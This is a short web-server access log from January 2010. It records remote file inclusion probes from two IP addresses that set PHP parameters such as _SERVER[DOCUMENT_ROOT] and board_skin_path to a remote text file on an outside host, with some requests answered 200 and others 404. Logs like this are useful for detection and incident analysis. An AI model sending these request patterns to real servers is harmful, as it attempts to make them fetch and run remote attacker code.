125.248.104.130 - - [05/Jan/2010:04:03:54 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:04:03:54 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:04:04:33 -0500] "GET /////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 455 "-" "Mozilla/5.0"
125.248.104.130 - - [05/Jan/2010:04:04:33 -0500] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.mtechnology.it/components/sh/id1.txt??? HTTP/1.1" 200 32916 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:04:54 -0500] "GET /logs/access_log.Q109112100/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:04:54 -0500] "GET /bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
211.232.85.247 - - [05/Jan/2010:04:04:54 -0500] "GET /logs/bbs/board.php?board_skin_path=http://www.mtechnology.it/components/sh/id1.txt???? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
